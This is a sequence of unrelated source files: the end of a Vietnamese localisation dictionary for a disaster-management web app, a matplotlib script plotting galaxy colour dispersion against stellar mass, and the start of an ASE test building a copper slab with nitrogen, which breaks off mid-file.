'Weak': 'Yếu', 'Web API settings updated': 'Cài đặt API Trang thông tin được cập nhật', 'Web API': 'API Trang thông tin', 'Web Form': 'Kiểu Trang thông tin', 'Web Map Service Browser Name': 'Tên Trình duyệt Dịch vụ Bản đồ Trang thông tin', 'Web Map Service Browser URL': 'URL Trình duyệt Dịch vụ Bản đồ Trang thông tin', 'Web2py executable zip file found - Upload to replace the existing file': 'Tệp tin nén có thể thực hiện chức năng gián điệp - Đăng tải để thay thế tệp tin đang tồn tại', 'Web2py executable zip file needs to be uploaded to use this function.': 'Tệp tin nén có thể thực hiện chức năng gián điệp cần được đăng tải để sử dụng chức năng này.', 'Website': 'Trang thông tin', 'Week': 'Tuần', 'Weekly': 'Hàng tuần', 'Weight (kg)': 'Trọng lượng (kg)', 'Weight': 'Trọng lượng', 'Welcome to %(system_name)s': 'Chào mừng anh/chị truy cập %(system_name)s', 'Welcome to the': 'Chào mừng bạn tới', 'Well-Known Text': 'Từ khóa thường được dùng', 'What are you submitting?': 'Bạn đang gửi cái gì?', 'What order to be contacted in.': 'Đơn hàng nào sẽ được liên hệ trao đổi.', 'What the Items will be used for': 'Các mặt hàng sẽ được sử dụng để làm gì', 'When this search was last checked for changes.': 'Tìm kiếm này được kiểm tra lần cuối là khi nào để tìm ra những thay đổi.', 'Whether the Latitude & Longitude are inherited from a higher level in the location hierarchy rather than being a separately-entered figure.': 'Vĩ độ & Kinh độ có được chiết xuất từ một địa điểm có phân cấp hành chính cao hơn hay là một con số được nhập riêng lẻ.', 'Whether the resource should be tracked using S3Track rather than just using the Base Location': 'Nguồn lực nên được theo dõi sử dụng Dấu vết S3 hay chỉ sử dụng Địa điểm cơ bản', 'Which methods to apply when importing data to the local repository': 'Áp dụng phương pháp nào khi nhập dữ liệu vào kho dữ liệu nội bộ', 'Whiskers': 'Râu', 'Who is doing What Where': 'Ai đang làm Gì Ở đâu', 'Who usually collects water for the family?': 'Ai là người thường đi lấy nước cho cả gia đình', 'Widowed': 'Góa', 'Width (m)': 'Rộng (m)', 'Width': 'Độ rộng', 'Wild Fire': 'Cháy Lớn', 'Will be filled automatically when the Item has been Repacked': 'Sẽ được điền tự động khi Hàng hóa được Đóng gói lại', 'Will be filled automatically when the Shipment has been Received': 'Sẽ được điền tự động khi Lô hàng được Nhận', 'Wind Chill': 'Rét cắt da cắt thịt', 'Winter Storm': 'Bão Mùa đông', 'Women of Child Bearing Age': 'Phụ nữ trong độ tuổi sinh sản', 'Women who are Pregnant or in Labour': 'Phụ nữ trong thời kỳ thai sản', 'Work phone': 'Điện thoại công việc', 'Work': 'Công việc', 'Workflow not specified!': 'Chuỗi công việc chưa được xác định!', 'Workflow': 'Chuỗi công việc', 'Working hours end': 'Hết giờ làm việc', 'Working hours start': 'Bắt đầu giờ làm việc', 'X-Ray': 'Tia X', 'XML parse error': 'Lỗi phân tích cú pháp trong XML', 'XSLT stylesheet not found': 'Không tìm thấy kiểu bảng tính XSLT', 'XSLT transformation error': 'Lỗi chuyển đổi định dạng XSLT', 'XYZ Layer': 'Lớp XYZ', 'YES': 'CÓ', 'Year of Manufacture': 'Năm sản xuất', 'Year that the organization was founded': 'Năm thành lập tổ chức', 'Year': 'Năm', 'Yes': 'Có', 'Yes, No': 'Có, Không', 'You are about to submit indicator ratings for': 'Bạn chuẩn bị gửi đánh giá chỉ số cho', 'You are attempting to delete your own account - are you sure you want to proceed?': 'Bạn đang cố gắng xóa tài khoản của bạn - bạn có chắc chắn muốn tiếp tục không?', 'You are currently reported missing!': 'Hiện tại bạn được báo cáo là đã mất tích!', 'You are not permitted to approve documents': 'Bạn không được phép phê duyệt tài liệu', 'You are not permitted to upload files': 'Bạn không được phép đăng tải tệp tin', 'You are viewing': 'Bạn đang xem', 'You can click on the map below to select the Lat/Lon fields': 'Bạn có thể nhấn vào bản đồ phía dưới để chọn các trường Vĩ độ/Kinh độ', 'You can only make %d kit(s) with the available stock': 'Bạn chỉ có thể điền %d bộ(s) với các số lượng hàng có sẵn', 'You can select the Draw tool': 'Bạn có thể lựa chọn công cụ Vẽ', 'You can set the modem settings for SMS here.': 'Bạn có thể cài đặt modem cho tin nhắn ở đây', 'You can use the Conversion Tool to convert from either GPS coordinates or Degrees/Minutes/Seconds.': 'Bạn có thể sử dụng Công cụ Đổi để chuyển đổi từ tọa độ GPS (Hệ thống định vị toàn cầu) hoặc Độ/ Phút/ Giây.', 'You do not have permission for any facility to add an order.': 'Bạn không có quyền đối với bất kỳ tính năng nào để thêm đơn đặt hàng.', 'You do not have permission for any facility to make a commitment.': 'Bạn không có quyền đối với bất kỳ tính năng nào để đưa ra cam kết.', 'You do not have permission for any facility to make a request.': 'Bạn không có quyền đối với bất kỳ tính năng nào để đưa ra yêu cầu.', 'You do not have permission for any facility to perform this action.': 'Bạn không có quyền đối với bất kỳ tính năng nào để thực hiện hành động này.', 'You do not have permission for any facility to receive a shipment.': 'Bạn không có quyền đối với bất kỳ tính năng nào để nhận chuyến hàng.', 'You do not have permission for any facility to send a shipment.': 'Bạn không có quyền đối với bất kỳ tính năng nào để gửi chuyến hàng.', 'You do not have permission for any organization to perform this action.': 'Bạn không có quyền truy cập bất cứ tổ chức nào để thực hiện hành động này', 'You do not have permission for any site to add an inventory item.': 'Bạn không được phép thêm mặt hàng lưu kho tại bất kỳ địa điểm nào.', 'You do not have permission to adjust the stock level in this warehouse.': 'Bạn không được phép điều chỉnh cấp độ lưu kho trong nhà kho này.', 'You do not have permission to cancel this received shipment.': 'Bạn không được phép hủy lô hàng đã nhận này.', 'You do not have permission to cancel this sent shipment.': 'Bạn không được phép hủy lô hàng đã gửi này.', 'You do not have permission to make this commitment.': 'Bạn không được phép thực hiện cam kết này.', 'You do not have permission to receive this shipment.': 'Bạn không được phép nhận lô hàng này.', 'You do not have permission to return this sent shipment.': 'Bạn không được phép trả lại lô hàng đã gửi này.', 'You do not have permission to send messages': 'Bạn không được phép gửi tin nhắn', 'You do not have permission to send this shipment.': 'Bạn không được phép gửi lô hàng này.', 'You have unsaved changes. You need to press the Save button to save them': 'Bạn chưa lưu lại những thay đổi. Bạn cần nhấn nút Lưu để lưu lại những thay đổi này', 'You must enter a minimum of %d characters': 'Bạn phải điền ít nhất %d ký tự', 'You must provide a series id to proceed.': 'Bạn phải nhập số id của serie để thao tác tiếp', 'You need to check all item quantities and allocate to bins before you can receive the shipment': 'Bạn cần kiểm tra số lượng của tất cả các mặt hàng và chia thành các thùng trước khi nhận lô hàng', 'You need to check all item quantities before you can complete the return process': 'Bạn cần kiểm tra số lượng của tất cả các mặt hàng trước khi hoàn tất quá trình trả lại hàng', 'You need to create a template before you can create a series': 'Bạn cần tạo ra một biểu mẫu trước khi tạo ra một loạt các biểu mẫu', 'You need to use the spreadsheet which you can download from this page': 'Bạn cần sử dụng bảng tính tải từ trang này', 'You should edit Twitter settings in models/000_config.py': 'Bạn nên chỉnh sửa cài đặt Twitter trong các kiểu models/000-config.py', 'Your name for this search. Notifications will use this name.': 'Tên của bạn cho tìm kiếm này. Các thông báo sẽ sử dụng tên này.', 'Your post was added successfully.': 'Bạn đã gửi thông tin thành công', 'Youth Development': 'Phát triển thanh thiếu niên', 'Youth and Volunteer Development': 'Phát triển TNV và Thanh thiếu niên', 'Zone Types': 'Các loại vùng châu lục', 'Zones': 'Vùng châu lục', 'Zoom In: click in the map or use the left mouse button and drag to create a rectangle': 'Phóng to: nhấn vào bản đồ hoặc sử dụng nút chuột trái và kéo để tạo ra một hình chữ nhật', 'Zoom Levels': 'Các cấp độ phóng', 'Zoom Out: click in the map or use the left mouse button and drag to create a rectangle': 'Thu nhỏ: nhấn vào bản đồ hoặc sử dụng nút chuột trái và kéo để tạo ra một hình chữ nhật', 'Zoom in closer to Edit OpenStreetMap layer': 'Phóng gần hơn tới lớp Sửa Bản đồ Đường đi Chưa xác định', 'Zoom to Current Location': 'Phóng đến Địa điểm Hiện tại', 'Zoom to maximum map extent': 'Phóng to để mở rộng tối đa bản đồ', 'Zoom': 'Phóng', 'access granted': 'truy cập được chấp thuận', 'activate to sort column ascending': 'Sắp xếp theo thứ tự tăng dần', 'activate to sort column descending': 'Sắp xếp theo thứ tự giảm dần', 'active': 'đang hoạt động', 'adaptation to climate change, sustainable development': 'thích ứng với biến đổi khí hậu, phát triển bền vững', 'always update': 'luôn luôn cập nhật', 'an individual/team to do in 1-2 days': 'một cá nhân/nhóm thực hiện trong 1-2 ngày', 'and': 'và', 'anonymous user': 'Người dùng nặc danh', 'assigned': 'đã phân công', 'at-risk populations, including: children, orphans, disabled, elderly, homeless, hospitalized people, illegal immigrants, illiterate, medically or chemically dependent, impoverished p': 'đối tượng chịu rủi ro gồm có: trẻ em, trẻ mồ côi, người khuyết tật, người già, người vô gia cư, người bệnh, dân di cư bất hợp pháp, người không biết chữ, người phải điều trị hóa chất hoặc điều trị y tế, người nghèo ', 'average': 'Trung bình', 'black': 'đen', 'blond': 'Tóc vàng', 'blue': 'Xanh da trời', 'brown': 'Nâu', 'bubonic plague, cholera, dengue, non-pandemic diseases, typhoid': 'bệnh dịch hạch, dịch tả, bệnh đănggơ, bệnh không phát dịch, bệnh thương hàn', 'building back better, long-term recovery and reconstruction, rehabilitation, shelter': 'hồi phục tốt hơn, tái xây dựng và phục hồi lâu dài, nhà tạm', 'building codes, building standards, building materials, construction, retrofitting': 'luật xây dựng, tiêu chuẩn xây dựng, vật liệu xây dựng, trang bị thêm ', 'by %(person)s': 'bởi %(person)s', 'by': 'bởi', 'can be used to extract data from spreadsheets and put them into database tables.': 'có thể dùng để trích xuất dữ liệu từ bẳng tính đưa vào cơ sở dữ liệu', 'cannot be deleted.': 'không thể xóa', 'capacity of health practitioners, mental health': 'năng lực của cán bộ CSSK, sức khỏe tâm thần', 'check all': 'kiểm tra tất cả', 'civic action, collective community action, community-based organization (CBO) action, grassroots action, integrative DRR, non-governmental organization (NGO) action': 'hành động của công dân, của cộng đồng, của các tổ chức dựa vào cộng đồng, GNRRTH mang tính tích hợp, các hành động của các tổ chức phi chính phủ.', 'civil protection, contingency and emergency planning, early recovery, preparedness': 'bảo vệ nhân dân, lập kế hoạch dự phòng và ứng phó với tình huống khẩn cấp, phục hồi nhanh, phòng ngừa', 'clear': 'xóa', 'click here': 'Ấn vào đây', 'coastal flood, wave surge, wind setup': 'lũ ven biển, sóng dâng cao, tạo gió', 'consider': 'cân nhắc', 'contains': 'Gồm có', 'coping capacity, loss absorption, loss acceptance, psychosocial support, social vulnerability, trauma prevention': 'khả năng ứng phó, khả năng chịu tổn thất, hỗ trợ tâm lý, tổn thương xã hội, ngăn ngừa các chấn thương tâm lý', 'corporate social responsibility, private sector engagement in DRR': 'trách nhiệm với xã hội của các công ty, tập đoàn, sự tham gia của khu vực tư nhân vào công tác GNRRTH', 'cost benefit analysis, disaster risk financing, financial effects of disasters, poverty and disaster risk, risk sharing, socio-economic impacts of disasters': 'phân tích lợi ích kinh tế, hỗ trợ tài chính cho hoạt động ứng phó với rủi ro thảm họa, ảnh hưởng tài chính của thảm họa, nghèo đói và rủi ro thảm họa, sự tác động đến kinh tế xã hội của thảm họa', 'crater, lava, magma, molten materials, pyroclastic flows, volcanic rock, volcanic ash': 'dung nham, vật liệu nóng chảy, nham tầng phun trào, nham thạch, bụi núi lửa', 'created': 'Đã tạo', 'curly': 'Xoắn', 'current': 'Đang hoạt động', 'daily': 'hàng ngày', 'dark': 'tối', 'database %s select': '%s cơ sở dự liệu lựa chọn', 'database': 'Cơ sở Dữ liệu', 'days': 'các ngày', 'debris flow, mud flow, mud slide, rock fall, slide, lahar, rock slide and topple': 'sạt lở đất, đá, sạt bùn', 'deceased': 'Đã chết', 'deficiency of precipitation, desertification, pronounced absence of rainfall': 'thiếu nước, sa mạc hóa, không có mưa kéo dài', 'delete all checked': 'Xóa tất cả các chọn', 'deleted': 'đã xóa', 'disaster databases, disaster information, disaster risk information portals, ICT': 'cơ sở dữ liệu về thảm họa, thông tin thảm họa, cổng thông tin về rủi ro thảm họa, ICT', 'disaster insurance, contingency funding, micro-insurance, post-disaster loans, risk financing, risk insurance, risk sharing, pooling': 'bảo hiểm thảm họa, quỹ dự phòng, bảo hiểm vi mô, khoản vay sau thảm họa, hỗ trợ tài chính nhằm ứng phó với rủi ro, chia sẻ, hợp nhất nhằm ứng phó với rủi ro', 'disaster reporting, disaster information dissemination': 'báo cáo thảm họa, tuyên truyền thông tin về thảm họa', 'disaster risk reduction policy and legislation, National Platform for disaster risk reduction, Regional Platforms for disaster risk reduction': 'việc banh hành và hoạch định chính sách về GNRRTH, Diễn đàn quốc gia về GNRRTH, Diễn đàn khu vực về GNRRTH', 'diseased': 'Bị dịch bệnh', 'displaced': 'Sơ tán', 'divorced': 'ly hôn', 'does not contain': 'không chứa', 'drinking water, freshwater, irrigation, potable water, water and sanitation, water resource management': 'nước uống, nước ngọt, hệ thống tưới tiêu, nước sạch và vệ sinh, quản lý nguồn nước', 'e.g. Census 2010': 'ví dụ Điều tra 2010', 'editor': 'người biên tập', 'expired': 'đã hết hạn', 'export as csv file': 'Xuất dưới dạng file csv', 'extreme weather, extreme temperature, cold temperatures': 'thời tiết cực đoan, nhiệt độ khắc nghiệt, nhiệt độ lạnh', 'extreme weather, extreme temperature, high temperatures': 'thời tiết cực đoan, nhiệt độ khắc nghiệt, nhiệt độ cao', 'fair': 'công bằng', 'fat': 'béo', 'feedback': 'phản hồi', 'female': 'nữ', 'fill in order: day(2) month(2) year(4)': 'điền theo thứ tự: ngày(2) tháng(2) năm(4)', 'fill in order: hour(2) min(2) day(2) month(2) year(4)': 'điền theo thứ tự: giờ(2) phút(2) ngày(2) tháng(2) năm(4)', 'forehead': 'Phía trước', 'form data': 'Tạo dữ liệu', 'found': 'Tìm thấy', 'full': 'đầy đủ', 'gendered vulnerability, gender-sensitive disaster risk management': 'tình trạng dễ bị tổn thương có yếu tố về giới, quản lý rủi ro thảm họa có tính nhạy cảm về giới', 'geographic information systems, hazard exposure mapping, vulnerability mapping, risk mapping': 'hệ thống thông tin địa lý, bản đồ hiểm họa, bản đồ tình trạng dễ bị tổn thương, bản đồ rủi ro', 'getting': 'đang nhận được', 'green': 'xanh lá cây', 'grey': 'xám', 'here': 'ở đây', 'hourly': 'hàng giờ', 'hours': 'thời gian hoạt động', 'hurricane, tropical storm, tropical depression, typhoon': 'bão, bão nhiệt đới, áp thấp nhiệt đới', 'ignore': 'bỏ qua', 'in GPS format': 'Ở định dạng GPS', 'in Stock': 'Tồn kho', 'in this': 'trong đó', 'in': 'trong', 'injured': 'Bị thương', 'input': 'nhập liệu', 'insert new %s': 'Thêm mới %s', 'insert new': 'Thêm mới', 'insufficient number of pages provided': 'không đủ số lượng trang được cung cấp', 'inundation; includes: flash floods': 'ngập úng, lũ quét', 'invalid request': 'Yêu cầu không hợp lệ', 'is a central online repository where information on all the disaster victims and families, especially identified casualties, evacuees and displaced people can be stored. Information like name, age, contact number, identity card number, displaced location, and other details are captured. Picture and finger print details of the people can be uploaded to the system. People can also be captured by group for efficiency and convenience.': 'là trung tâm thông tin trực tuyến, nơi lưu trữ thông tin về các nạn nhân và gia đình chịu ảnh hưởng của thiên tai, đặc biệt là xác định con số thương vong và lượng người sơ tán.Thông tin như tên, tuổi, số điện thoại, số CMND, nơi sơ tán và các thông tin khác cũng được lưu lại.Ảnh và dấu vân tay cũng có thể tải lên hệ thống.Để hiệu quả và tiện lợi hơn có thể quản lý theo nhóm', 'items selected': 'mặt hàng được lựa chọn', 'key': 'phím', 'label': 'Nhãn', 'latrines': 'nhà vệ sinh', 'learning, safe schools': 'trường học an toàn, giáo dục', 'light': 'Ánh sáng', 'local knowledge, local risk mapping': 'hiểu biết của địa phương, lập bản đồ rủi ro của địa phương', 'locust, plague, African bees': 'châu chấu, ong Châu Phi', 'long': 'dài', 'long>12cm': 'dài>12cm', 'male': 'Nam', 'mandatory fields': 'Trường bắt buộc', 'married': 'đã kết hôn', 'max': 'tới', 'maxExtent': 'Mở rộng tối đa', 'maxResolution': 'Độ phân giải tối đa', 'medium': 'trung bình', 'medium<12cm': 'trung bình <12cm', 'min': 'từ', 'minutes': 'biên bản', 'missing': 'mất tích', 'moderate': 'trung bình', 'module allows the site administrator to configure various options.': 'mô đun cho phép người quản trị trang thông tin cài đặt cấu hình các tùy chọn khác nhau', 'module helps monitoring the status of hospitals.': 'module giúp theo dõi tình trạng bệnh viện', 'multiple hazard crisis, humanitarian crisis, conflict': 'đa hiểm họa, xung đột, khủng hoảng nhân đạo', 'multiplier[0]': 'số nhân[0]', 'natural hazard': 'thảm họa thiên nhiên', 'negroid': 'người da đen', 'never update': 'không bao giờ cập nhật', 'never': 'không bao giờ', 'new ACL': 'ACL mới', 'new': 'thêm mới', 'next 50 rows': '50 dòng tiếp theo', 'no options available': 'không có lựa chọn sẵn có', 'no': 'không', 'none': 'không có', 'normal': 'bình thường', 'not specified': 'không xác định', 'obsolete': 'Đã thôi hoạt động', 'of total data reported': 'của dữ liệu tổng được báo cáo', 'of': 'của', 'offices by organisation': 'văn phòng theo tổ chức', 'on %(date)s': 'vào %(date)s', 'or import from csv file': 'hoặc nhập dữ liệu từ tệp tin csv', 'or': 'hoặc', 'other': 'khác', 'out of': 'ngoài ra', 'over one hour': 'hơn một tiếng', 'overdue': 'quá hạn', 'paid': 'đã nộp', 'per month': 'theo tháng', 'piece': 'chiếc', 'poor': 'nghèo', 'popup_label': 'nhãn_cửa sổ tự động hiển thị', 'previous 50 rows': '50 dòng trước', 'problem connecting to twitter.com - please refresh': 'lỗi kết nối với twitter.com - vui lòng tải lại', 'provides a catalogue of digital media.': 'cung cấp danh mục các phương tiện truyền thông kỹ thuật số', 'pull and push': 'kéo và đẩy', 'pull': 'kéo', 'push': 'đẩy', 'record does not exist': 'Thư mục ghi không tồn tại', 'record id': 'lưu tên truy nhập', 'records deleted': 'hồ sơ đã được xóa', 'red': 'đỏ', 'replace': 'thay thế', 'reports successfully imported.': 'báo cáo đã được nhập khẩu thành công', 'representation of the Polygon/Line.': 'đại diện của Polygon/Line.', 'retry': 'Thử lại', 'risk assessment, loss data, disaster risk management': 'đánh giá rủi ro, dữ liệu thiệt hại, quản lý rủi ro thảm họa', 'risk knowledge, monitoring and warning service, risk communication, response capability, disaster preparedness, risk modelling': 'tăng cường hiểu biết về rủi ro, hoạt động cảnh báo và giám sát, truyền thông về rủi ro, khả năng ứng phó, phòng ngừa thảm họa, lập mô hình ứng phó với rủi ro', 'river': 'sông', 'row.name': 'dòng.tên', 'search': 'tìm kiếm', 'seconds': 'giây', 'see comment': 'xem ghi chú', 'seismic, tectonic': 'địa chấn', 'selected': 'Được chọn', 'separated from family': 'Chia tách khỏi gia đình', 'separated': 'ly thân', 'shaved': 'bị cạo sạch', 'short': 'Ngắn', 'short<6cm': 'Ngắn hơn <6cm', 'sides': 'các mặt', 'sign-up now': 'Đăng ký bây giờ', 'simple': 'đơn giản', 'single': 'độc thân', 'slim': 'mỏng', 'straight': 'thẳng hướng', 'strong': 'Mạnh', 'sublayer.name': 'tên.lớp dưới', 'submitted by': 'được gửi bởi', 'suffered financial losses': 'Các mất mát tài chính đã phải chịu', 'sustainable development, environmental degradation, ecosystems and environmental management': 'phát triển bền vững, thoái hóa môi trường, quản lý môi trường và hệ sinh thái', 'table': 'bảng', 'tall': 'cao', 'text': 'từ khóa', 'times (0 = unlimited)': 'thời gian (0 = vô hạn)', 'times and it is still not working. We give in. Sorry.': 'Nhiều lần mà vẫn không có kết quả, thất bại, xin lỗi', 'times': 'thời gian', 'to access the system': 'truy cập vào hệ thống', 'to download a OCR Form.': 'Để tải xuống một mẫu OCR', 'tonsure': 'lễ cạo đầu', 'total': 'tổng', 'training and development, institutional strengthening, institutional learning': 'tập huấn và phát triển, tăng cường thể chế, tăng cường hiểu biết của tổ chức', 'tweepy module not available within the running Python - this needs installing for non-Tropo Twitter support!': 'mô đun tweepy không có trong quá trình chạy Python - cần cài đặt để hỗ trợ Twitter không có Tropo!', 'unapproved': 'chưa được chấp thuận', 'uncheck all': 'bỏ chọn toàn bộ', 'unknown': 'không biết', 'unlimited': 'vô hạn', 'up to 3 locations': 'lên tới 3 địa điểm', 'update if master': 'cập nhật nếu là bản gốc', 'update if newer': 'cập nhật nếu mới hơn', 'update': 'cập nhật', 'updated': 'đã cập nhật', 'urban fire, bush fire, forest fire, uncontrolled fire, wildland fire': 'cháy trong đô thị, cháy rừng, cháy không kiểm soát, cháy vùng đất hoang dã', 'urban planning, urban management': 'quy hoạch đô thị, quản lý đô thị', 'using default': 'sử dụng mặc định', 'waterspout, twister, vortex': 'vòi rồng, gió xoáy, giông lốc', 'wavy': 'dạng sóng', 'weekly': 'hàng tuần', 'weeks': 'tuần', 'white': 'trắng', 'wider area, longer term, usually contain multiple Activities': 'khu vực rộng lớn hơn, dài hạn hơn, thường chứa nhiều Hoạt động', 'widowed': 'góa', 'within human habitat': 'trong khu dân cư', 'yes': 'có', }
gallifrey17/eden
languages/vi.py
Python
mit
373,313
[ "VisIt" ]
1cdc7c0136ecca5506795f641172dee39567a824eb92f0b87c8357c3bb46d6de
#!/usr/bin/env python import pylab as pyl import cPickle as pickle from astLib import astCalc def plot_icd_vs_mass(): galaxies = pickle.load(open('galaxies.pickle','rb')) galaxies = filter(lambda galaxy: 0.06 * galaxy.halflight *\ astCalc.da(galaxy.z)*1000/206265. > 2, galaxies) # Make figure f1 = pyl.figure(1, figsize=(6,4)) f1s1 = f1.add_subplot(121) f1s2 = f1.add_subplot(122) # f1s3 = f1.add_subplot(223) # f1s4 = f1.add_subplot(224) #Upper and Lower limit arrow verts arrowup_verts = [[0.,0.], [-1., -1], [0.,0.], [0.,-2.], [0.,0.], [1,-1], [0,0]] #arrowdown_verts = [[0.,0.], [-1., 1], [0.,0.], # [0.,2.], [0.,0.], [1, 1]] for galaxy in galaxies: if galaxy.ston_I > 30. and galaxy.ICD_IH != None: # Add arrows first if galaxy.ICD_IH > 0.5: f1s1.scatter(galaxy.Mass, 0.5*100, s=100, marker=None, verts=arrowup_verts) else: f1s1.scatter(galaxy.Mass, galaxy.ICD_IH * 100, c='0.8', marker='o', s=25, edgecolor='0.8') f1s2.scatter(galaxy.Mass, galaxy.ICD_IH * 100, c='0.8', marker='o', s=25, edgecolor='0.8') ''' if galaxy.ston_J > 30. and galaxy.ICD_JH != None: # Add arrows first if galaxy.ICD_JH > 0.12: f1s3.scatter(galaxy.Mass, 12, s=100, marker=None, verts=arrowup_verts) else: f1s3.scatter(galaxy.Mass, galaxy.ICD_JH * 100, c='0.8', marker='o', s=25, edgecolor='0.8') f1s4.scatter(galaxy.Mass, galaxy.ICD_JH * 100, c='0.8', marker='o', s=25, edgecolor='0.8') ''' # Add the box and whiskers galaxies2 = filter(lambda galaxy: galaxy.ston_I > 30., galaxies) galaxies2 = pyl.asarray(galaxies2) x = [galaxy.Mass for galaxy in galaxies2] ll = 8.5 ul= 12 #bins_x =pyl.arange(8.5, 12.5, 0.5) bins_x =pyl.array([8.5, 9., 9.5, 10., 10.5, 11., 12.]) grid = [] for i in range(bins_x.size-1): xmin = bins_x[i] xmax = bins_x[i+1] cond=[cond1 and cond2 for cond1, cond2 in zip(x>=xmin, x<xmax)] grid.append(galaxies2.compress(cond)) icd = [] for i in range(len(grid)): icd.append([galaxy.ICD_IH*100 for galaxy in grid[i]]) from boxplot_percentile_width import percentile_box_plot as pbp #bp1 = f1s1.boxplot(icd, positions=pyl.delete(bins_x,-1)+0.25, sym='') width = pyl.diff(bins_x) index = pyl.delete(bins_x,-1) + 0.25 index[-1] = index[-1] + 0.25 pbp(f1s1, icd, indexer=list(index), width=width) pbp(f1s2, icd, indexer=list(index), width=width) ''' # Add the box and whiskers galaxies2 = filter(lambda galaxy: galaxy.ston_J > 30., galaxies) galaxies2 = pyl.asarray(galaxies2) x = [galaxy.Mass for galaxy in galaxies2] ll = 8.5 ul= 12 #bins_x =pyl.linspace(ll, ul, 7) #bins_x =pyl.arange(8.5, 12.5, 0.5) bins_x =pyl.array([8.5, 9., 9.5, 10., 10.5, 11., 12.]) grid = [] for i in range(bins_x.size-1): xmin = bins_x[i] xmax = bins_x[i+1] cond=[cond1 and cond2 for cond1, cond2 in zip(x>=xmin, x<xmax)] grid.append(galaxies2.compress(cond)) icd = [] for i in range(len(grid)): icd.append([galaxy.ICD_JH*100 for galaxy in grid[i]]) #bp2 = f1s2.boxplot(icd, positions=pyl.delete(bins_x,-1)+0.25, sym='') width = pyl.diff(bins_x) index = pyl.delete(bins_x,-1) + 0.25 index[-1] = index[-1] + 0.25 pbp(f1s3, icd, indexer=list(index), width=width) pbp(f1s4, icd, indexer=list(index), width=width) ''' # Finish Plot # Tweak colors on the boxplot #pyl.setp(bp1['boxes'], lw=2) #pyl.setp(bp1['whiskers'], lw=2) #pyl.setp(bp1['medians'], lw=2) #pyl.setp(bp2['boxes'], lw=2) #pyl.setp(bp2['whiskers'], lw=2) #pyl.setp(bp2['medians'], lw=2) #pyl.setp(bp['fliers'], color='#8CFF6F', marker='+') #f1s1.axvspan(7.477, 9, facecolor='#FFFDD0', ec='None', zorder=0) #f1s1.axvspan(11, 12, facecolor='#FFFDD0', ec='None', zorder=0) #f1s2.axvspan(7.477, 9, facecolor='#FFFDD0', ec='None', zorder=0) #f1s2.axvspan(11, 12, facecolor='#FFFDD0', ec='None', zorder=0) f1s1.set_xlim(8,12) f1s2.set_xlim(8,12) # f1s3.set_xlim(8,12) # f1s4.set_xlim(8,12) f1s1.set_ylim(-10,50) f1s2.set_ylim(0,15) # f1s3.set_ylim(-5,12) # f1s4.set_ylim(-1,3) f1s1.set_xticks([8,9,10,11,12]) # f1s1.set_xticklabels([]) f1s2.set_xticks([8,9,10,11,12]) # f1s2.set_xticklabels([]) # f1s3.set_xticks([8,9,10,11,12]) # f1s4.set_xticks([8,9,10,11,12]) # f1s4.set_yticks([-1, 0, 1, 2, 3]) f1s1.set_ylabel(r"$\xi[i_{775},H_{160}]$ (%)") f1s1.set_xlabel(r"Log Mass ($M_{\odot})$") f1s2.set_xlabel(r"Log Mass ($M_{\odot})$") # f1s3.set_ylabel(r"$\xi[J_{125},H_{160}]$ (%)") import matplotlib.font_manager line1 = pyl.Line2D([], [], marker='o', mfc='0.8', mec='0.8', markersize=8, linewidth=0) line2 = pyl.Line2D([], [], marker='s', mec='#348ABD', mfc='None', markersize=10, linewidth=0, markeredgewidth=2) line3 = pyl.Line2D([], [], color='#A60628', linewidth=2) prop = matplotlib.font_manager.FontProperties(size='small') pyl.figlegend((line1, line2, line3), ('Data', 'Quartiles', 'Medians'), 'lower center', prop=prop, ncol=3) from matplotlib.patches import ConnectionPatch xy = (12, 15) xy2 = (8, 15) con = ConnectionPatch(xyA=xy, xyB=xy2, coordsA='data', coordsB='data', axesA=f1s1, axesB=f1s2) xy = (12, 0) xy2 = (8, 0) con2 = ConnectionPatch(xyA=xy, xyB=xy2, coordsA='data', coordsB='data', axesA=f1s1, axesB=f1s2) f1s1.add_artist(con) f1s1.add_artist(con2) xy = (12, 3) xy2 = (8, 3) # con = ConnectionPatch(xyA=xy, xyB=xy2, coordsA='data', coordsB='data', # axesA=f1s3, axesB=f1s4) xy = (12, -1) xy2 = (8, -1) # con2 = ConnectionPatch(xyA=xy, xyB=xy2, coordsA='data', coordsB='data', # axesA=f1s3, axesB=f1s4) # f1s3.add_artist(con) # f1s3.add_artist(con2) pyl.draw() pyl.show() if __name__=='__main__': plot_icd_vs_mass()
boada/ICD
sandbox/plot_icd_mass_box_width.py
Python
mit
6,289
[ "Galaxy" ]
18bcc6401644d408d4c9fef2bbde7e3b9d7971f20facbf5905f5fa876a9814cc
from ase import Atoms, Atom from ase.calculators.emt import EMT from ase.constraints import FixAtoms from ase.optimize.test import run_test name = 'N2Cu' def get_atoms_surf(): a = 2.70 c = 1.59 * a h = 1.85 d = 1.10 slab = Atoms('2Cu', [(0., 0., 0.), (1/3., 1/3., -0.5*c)], tags=(0, 1), pbc=(1, 1, 0)) slab.set_cell([(a, 0, 0), (a / 2, 3**0.5 * a / 2, 0), (0, 0, 1)]) slab = slab.repeat((4, 4, 1)) mask = [a.tag == 1 for a in slab] slab.set_constraint(FixAtoms(mask=mask)) return slab def get_atoms_adsorbate(): # We need the relaxed slab here! slab = Atoms([ Atom('Cu', [ -1.028468159509163, -0.432387156877267, -0.202086055768265]), Atom('Cu', [ 0.333333333333333, 0.333333333333333, -2.146500000000000]), Atom('Cu', [ 1.671531840490805, -0.432387156877287, -0.202086055768242]), Atom('Cu', [ 3.033333333333334, 0.333333333333333, -2.146500000000000]), Atom('Cu', [ 4.371531840490810, -0.432387156877236, -0.202086055768261]), Atom('Cu', [ 5.733333333333333, 0.333333333333333, -2.146500000000000]), Atom('Cu', [ 7.071531840490944, -0.432387156877258, -0.202086055768294]), Atom('Cu', [ 8.433333333333335, 0.333333333333333, -2.146500000000000]), Atom('Cu', [ 0.321531840490810, 1.905881433340708, -0.202086055768213]), Atom('Cu', [ 1.683333333333333, 2.671601923551318, -2.146500000000000]), Atom('Cu', [ 3.021531840490771, 1.905881433340728, -0.202086055768250]), Atom('Cu', [ 4.383333333333334, 2.671601923551318, -2.146500000000000]), Atom('Cu', [ 5.721531840490857, 1.905881433340735, -0.202086055768267]), Atom('Cu', [ 7.083333333333333, 2.671601923551318, -2.146500000000000]), Atom('Cu', [ 8.421531840490820, 1.905881433340739, -0.202086055768265]), Atom('Cu', [ 9.783333333333335, 2.671601923551318, -2.146500000000000]), Atom('Cu', [ 1.671531840490742, 4.244150023558601, -0.202086055768165]), Atom('Cu', [ 3.033333333333334, 5.009870513769302, -2.146500000000000]), Atom('Cu', [ 4.371531840490840, 4.244150023558694, -0.202086055768265]), Atom('Cu', [ 